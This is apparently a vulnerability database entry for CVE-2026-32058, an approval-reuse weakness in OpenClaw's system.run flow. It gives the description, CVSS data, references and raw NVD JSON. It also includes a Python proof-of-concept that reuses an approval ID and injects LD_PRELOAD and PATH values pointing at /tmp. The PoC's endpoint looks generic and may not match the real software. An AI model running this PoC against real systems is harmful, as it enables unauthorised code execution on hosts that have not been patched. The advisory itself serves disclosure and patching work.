CVE-2026-32058

Description

OpenClaw versions prior to 2026.2.26 contain an approval context-binding weakness in system.run execution flows with host=node that allows reuse of previously approved requests with modified environment variables. Attackers with access to an approval id can exploit this by reusing an approval with changed env input, bypassing execution-integrity controls in approval-enabled workflows.

CVSS Details

CVSS Score

2.6

Severity

LOW

CVSS Vector

CVSS:3.1/AV:N/AC:H/PR:L/UI:R/S:U/C:N/I:L/A:N

Configurations (Affected Products)

cpe:2.3:a:openclaw:openclaw:*:*:*:*:*:node.js:*:* - VULNERABLE

OpenClaw < 2026.2.26

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

import requests

def exploit_openclaw(target_url, approval_id, malicious_env):
    """
    PoC for CVE-2026-32058
    Exploits the approval context-binding weakness by reusing a valid approval_id
    with modified environment variables.
    """
    headers = {
        "Content-Type": "application/json"
    }

    # The vulnerable endpoint for system.run
    endpoint = f"{target_url}/api/v1/system/run"

    # Construct payload reusing the approval ID but changing environment variables
    payload = {
        "host": "node",
        "approval_id": approval_id,
        "env": malicious_env,
        # Other necessary parameters for the command execution
        "command": "echo 'Execution triggered'"
    }

    try:
        response = requests.post(endpoint, json=payload, headers=headers, verify=False)
        if response.status_code == 200:
            print("[+] Exploit successful: Request executed with modified env.")
            print(f"[+] Response: {response.text}")
        else:
            print(f"[-] Exploit failed with status code: {response.status_code}")
    except Exception as e:
        print(f"[!] Error: {e}")

if __name__ == "__main__":
    # Example usage
    TARGET = "https://vulnerable-openclaw-instance"
    VALID_APPROVAL_ID = "550e8400-e29b-41d4-a716-446655440000"
    
    # Malicious environment variables to inject
    NEW_ENV = {
        "LD_PRELOAD": "/tmp/malicious.so",
        "PATH": "/tmp:/usr/bin"
    }
    
    exploit_openclaw(TARGET, VALID_APPROVAL_ID, NEW_ENV)

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-32058
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-32058
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-32058/
[4] VulDB https://vuldb.com/cve/CVE-2026-32058
[5] https://github.com/openclaw/openclaw/commit/10481097f8e6dd0346db9be0b5f27570e1bdfcfa
[6] https://github.com/openclaw/openclaw/security/advisories/GHSA-hjvp-qhm6-wrh2
[7] https://www.vulncheck.com/advisories/openclaw-approval-context-binding-weakness-in-system-run-via-host-node

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-32058", "sourceIdentifier": "[email protected]", "published": "2026-03-21T01:17:09.500", "lastModified": "2026-03-24T21:10:24.020", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "OpenClaw versions prior to 2026.2.26 contain an approval context-binding weakness in system.run execution flows with host=node that allows reuse of previously approved requests with modified environment variables. Attackers with access to an approval id can exploit this by reusing an approval with changed env input, bypassing execution-integrity controls in approval-enabled workflows."}, {"lang": "es", "value": "Versiones de OpenClaw anteriores a 2026.2.26 contienen una debilidad de vinculación de contexto de aprobación en los flujos de ejecución de system.run con host=node que permite la reutilización de solicitudes previamente aprobadas con variables de entorno modificadas. Atacantes con acceso a un ID de aprobación pueden explotar esto reutilizando una aprobación con una entrada de entorno (env) modificada, eludiendo los controles de integridad de ejecución en flujos de trabajo habilitados para aprobación."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:H/AT:P/PR:L/UI:A/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 2.0, "baseSeverity": "LOW", "attackVector": "NETWORK", "attackComplexity": "HIGH", "attackRequirements": "PRESENT", "privilegesRequired": "LOW", "userInteraction": "ACTIVE", "vulnConfidentialityImpact": "NONE", "vulnIntegrityImpact": "LOW", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:L/UI:R/S:U/C:N/I:L/A:N", "baseScore": 2.6, "baseSeverity": "LOW", "attackVector": "NETWORK", "attackComplexity": "HIGH", "privilegesRequired": "LOW", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 1.2, "impactScore": 1.4}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "HIGH", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-863"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:openclaw:openclaw:*:*:*:*:*:node.js:*:*", "versionEndExcluding": "2026.2.26", "matchCriteriaId": "2AB7D7E0-2F21-4EC6-A3D5-F53A644120E4"}]}]}], "references": [{"url": "https://github.com/openclaw/openclaw/commit/10481097f8e6dd0346db9be0b5f27570e1bdfcfa", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-hjvp-qhm6-wrh2", "source": "[email protected]", "tags": ["Vendor Advisory"]}, {"url": "https://www.vulncheck.com/advisories/openclaw-approval-context-binding-weakness-in-system-run-via-host-node", "source": "[email protected]", "tags": ["Third Party Advisory"]}]}}